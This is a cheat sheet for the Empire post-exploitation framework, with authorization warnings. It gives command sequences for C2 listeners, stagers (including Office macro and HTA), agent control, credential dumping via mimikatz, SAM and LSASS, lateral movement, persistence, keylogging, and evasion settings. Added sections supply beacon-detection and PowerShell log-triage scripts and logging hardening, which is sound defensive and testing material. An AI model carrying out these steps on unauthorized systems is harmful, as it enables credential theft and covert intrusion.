
# Empire Framework Cheat Sheet


## Overview

Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure-Python 3 Linux/macOS agent. It provides a powerful command-and-control (C2) infrastructure for red team operations, penetration testing and adversary emulation.

**Warning:** Empire is a security testing tool that should only be used in environments where you have explicit permission to do so.

## Installation

### From GitHub

```bash
# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh
```

### Using Docker

```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```

### On Kali Linux

```bash
# Install from the package manager
sudo apt update
sudo apt install powershell-empire
```

## Basic Usage

### Starting Empire

```bash
# Start the Empire server
sudo empire

# Start with the REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>
```

### Using Starkiller (GUI)

```bash
# Install Starkiller
npm install -g @starkiller/starkiller

# Run Starkiller
starkiller
```

### Empire CLI Navigation

| Command | Description |
|---------|-------------|
| `help` | Display help menu |
| `menu` | Return to the main menu |
| `back` | Go back one menu level |
| `exit` | Exit Empire |
| `usemodule <module>` | Select a module to use |
| `usestager <stager>` | Select a stager to use |
| `uselistener <listener>` | Select a listener to use |
| `interact <agent>` | Interact with an agent |
| `searchmodule <term>` | Search for modules |

## Listeners

### Creating a Listener

```bash
# In the Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute
```

### Common Listener Options

| Option | Description |
|--------|-------------|
| `Name` | Name for the listener |
| `Host` | IP/hostname for staging |
| `Port` | Port for the listener |
| `CertPath` | Certificate path for HTTPS |
| `DefaultDelay` | Agent callback delay (in seconds) |
| `DefaultJitter` | Jitter in agent callbacks (0.0-1.0) |
| `DefaultProfile` | Default communication profile |
| `KillDate` | Date for the listener to exit (MM/DD/YYYY) |
| `WorkingHours` | Hours for the agent to call back (09:00-17:00) |
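The `DefaultDelay`, `DefaultJitter` and `WorkingHours` options shape how regularly an agent calls back, which is exactly the regularity that network traffic analysis looks for on the defensive side. As an added example that is not part of the original cheat sheet or the Empire project, this script scores per-client request regularity over constructed proxy log lines; the log format, the thresholds and the `192.168.1.100:8080` destination are assumptions.

```python
"""Added example (not from the Empire project or the original cheat sheet):
flag beacon-like callbacks in constructed proxy log lines by measuring how
regular the gaps between a client's requests are, even with jitter applied."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, median, pstdev

BASE = datetime(2024, 5, 1, 9, 0, 0)
# Constructed sample: 10.0.0.5 calls back every ~60 s with jitter, 10.0.0.9 browses normally.
_BEACON_OFFSETS = [0, 58, 121, 177, 239, 302, 358, 419, 481, 540]
_BROWSE_OFFSETS = [0, 3, 4, 40, 41, 42, 200, 500, 505, 900]
SAMPLE_LOG = "\n".join(
    [f"{(BASE + timedelta(seconds=s)).isoformat()} 10.0.0.5 192.168.1.100:8080 /index.html"
     for s in _BEACON_OFFSETS]
    + [f"{(BASE + timedelta(seconds=s)).isoformat()} 10.0.0.9 www.example.com:443 /news"
       for s in _BROWSE_OFFSETS]
)

def parse_log(text):
    """Group request timestamps by (source, destination) pair (assumed 4-column format)."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _path = line.split()
        sessions[(src, dst)].append(datetime.fromisoformat(ts))
    return sessions

def beacon_score(timestamps, min_callbacks=6):
    """Return regularity metrics for one pair, or None if there are too few requests."""
    if len(timestamps) < min_callbacks:
        return None
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    cv = pstdev(gaps) / avg if avg else float("inf")  # coefficient of variation
    return {"callbacks": len(ts), "median_gap": median(gaps), "cv": round(cv, 3),
            "max_jitter": round(max(abs(g - avg) for g in gaps) / avg, 3)}

def find_beacons(text, max_cv=0.2, min_callbacks=6):
    """Pairs whose inter-request gaps are too regular for human browsing."""
    flagged = {}
    for pair, ts in parse_log(text).items():
        score = beacon_score(ts, min_callbacks)
        if score and score["cv"] <= max_cv:
            flagged[pair] = score
    return flagged

if __name__ == "__main__":
    for pair, score in find_beacons(SAMPLE_LOG).items():
        print(pair, score)
```

A low `cv` with a `max_jitter` well under 1.0 is the signature of a fixed delay plus bounded jitter; human browsing produces bursty gaps with `cv` above 1.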

### Managing Listeners

```bash
# List all listeners
listeners

# Kill a listener
kill http_listener

# View a listener's options
info http_listener
```

## Stagers

### Generating a Stager

```bash
# In the Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate
```

### Common Stager Types

| Stager | Description |
|--------|-------------|
| `windows/launcher_bat` | BAT file launcher |
| `windows/launcher_vbs` | VBS script launcher |
| `windows/launcher_powershell` | PowerShell launcher |
| `multi/launcher` | Multi-platform launcher |
| `osx/launcher` | macOS launcher |
| `linux/launcher` | Linux launcher |
| `windows/dll` | DLL launcher |
| `windows/macro` | Office macro launcher |
| `windows/hta` | HTA launcher |

## Agents

### Agent Commands

```bash
# List all agents
agents

# Interact with an agent
interact C2AGENT123

# Get agent info
info

# Execute a shell command
shell whoami

# Run a PowerShell command
powershell Get-Process

# Upload a file
upload /path/to/local/file /path/on/target

# Download a file
download /path/on/target /local/path

# Take a screenshot
screenshot

# Exit the agent menu
back
```

### Agent Management

```bash
# Rename an agent
rename C2AGENT123 new_name

# Kill an agent
kill C2AGENT123

# Remove an agent from the database
remove C2AGENT123

# Set the sleep interval (seconds)
sleep 30

# Display system information for the current agent
sysinfo
```

## Modules

### Using Modules

```bash
# List available modules
usemodule

# Search for modules
searchmodule credentials

# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user

# Set module options
set Username administrator

# Execute the module
execute
```

### Common Module Categories

#### Credential Access

```bash
# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords

# Dump the SAM database
usemodule powershell/credentials/sam

# Dump the LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump
```

#### Situational Awareness

```bash
# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user

# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer

# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group
```

#### Lateral Movement

```bash
# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi

# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec

# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm
```

#### Persistence

```bash
# Registry persistence
usemodule powershell/persistence/userland/registry

# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks

# WMI persistence
usemodule powershell/persistence/elevated/wmi
```

## Advanced Features

### Malleable C2 Profiles

```bash
# In the Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile
```

### OPSEC Considerations

```bash
# Set the agent kill date
set KillDate 01/01/2025

# Set working hours
set WorkingHours 09:00-17:00

# Increase agent sleep time
sleep 300 30
```

### Data Exfiltration

```bash
# Use the keylogging module
usemodule powershell/collection/keylogger

# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor

# Use the screenshot module
usemodule powershell/collection/screenshot
```

## Troubleshooting

### Common Issues

1. **Connection problems**
   ```bash
   # Check if the listener is running
   listeners

   # Verify firewall settings
   sudo iptables -L

   # Check for port conflicts
   netstat -tuln | grep <port>
   ```

2. **Agent not checking in**
   ```bash
   # Verify the agent is running
   agents

   # Check for network connectivity issues
   # Verify sleep/jitter settings
   ```

3. **Module execution failures**
   ```bash
   # Check module requirements
   info

   # Verify agent privileges
   shell whoami

   # Try running in a different process context
   usemodule powershell/management/psinject
   ```

## Defensive Measures

### Detection Methods
- PowerShell Script Block Logging
- PowerShell Module Logging
- AMSI (Antimalware Scan Interface)
- Network traffic analysis
- Behavioral analysis
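Script Block Logging records the full text of every script block PowerShell runs (Event ID 4104), including the decoded form of encoded commands, which is what makes it useful against PowerShell-based launchers. As an added example that is not part of the original cheat sheet or the Empire project, this script triages constructed 4104-style events for launcher-style indicators; the event layout, the indicator patterns and the two-indicator threshold are assumptions.

```python
"""Added example (not from the Empire project or the original cheat sheet):
triage PowerShell script block log entries (Event ID 4104) for launcher-style
indicators. Sample events are constructed; the indicator patterns are assumptions."""
import base64
import re

# Constructed sample events: the encoded command decodes to a harmless one-liner.
_ENC = base64.b64encode("Invoke-Expression 'Write-Output test'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 4104, "Path": "C:\\ops\\backup.ps1",
     "ScriptBlockText": "Get-Process | Where-Object CPU -gt 50"},
    {"EventID": 4104, "Path": "", "ScriptBlockText": f"powershell -NoP -W Hidden -Enc {_ENC}"},
    {"EventID": 4104, "Path": "", "ScriptBlockText": "IEX (Get-Content .\\stage.txt)"},
]

ENCODED_RX = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = {
    "encoded_command": ENCODED_RX,
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}

def decode_encoded_command(text):
    """Recover the UTF-16LE payload passed via -EncodedCommand, or None."""
    m = ENCODED_RX.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16 text
        return None

def triage_event(event):
    """Name the indicators hit in the block text and in any decoded payload."""
    text = event.get("ScriptBlockText", "")
    decoded = decode_encoded_command(text)
    haystack = text + ("\n" + decoded if decoded else "")
    return {"hits": [n for n, rx in INDICATORS.items() if rx.search(haystack)],
            "decoded": decoded,
            "script_path": event.get("Path") or "(in-memory)"}

def suspicious_events(events, min_hits=2):
    """Keep 4104 events that trip at least min_hits indicators."""
    results = [triage_event(e) for e in events if e.get("EventID") == 4104]
    return [r for r in results if len(r["hits"]) >= min_hits]

if __name__ == "__main__":
    for r in suspicious_events(SAMPLE_EVENTS):
        print(r["script_path"], r["hits"], "->", r["decoded"])
```

An empty `Path` (in-memory execution) combined with several command-line indicators is a stronger signal than any single pattern, so the threshold rather than one regex decides what is surfaced.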

### Prevention Techniques
```powershell
# Enable PowerShell Script Block Logging (the policy key usually does not exist yet, so create it first)
$sbl = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1

# Enable PowerShell Module Logging for all modules (the ModuleNames "*" entry selects every module)
$ml = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging"
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name "EnableModuleLogging" -Value 1
New-ItemProperty -Path "$ml\ModuleNames" -Name "*" -Value "*" -PropertyType String -Force | Out-Null

# Enable Constrained Language Mode for the current session only;
# enforce it fleet-wide through an AppLocker or WDAC policy instead
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
```

## Resources

-...

*This cheat sheet provides a complete reference for using Empire in security testing scenarios. Always make sure you have proper authorization before using this tool in any environment.*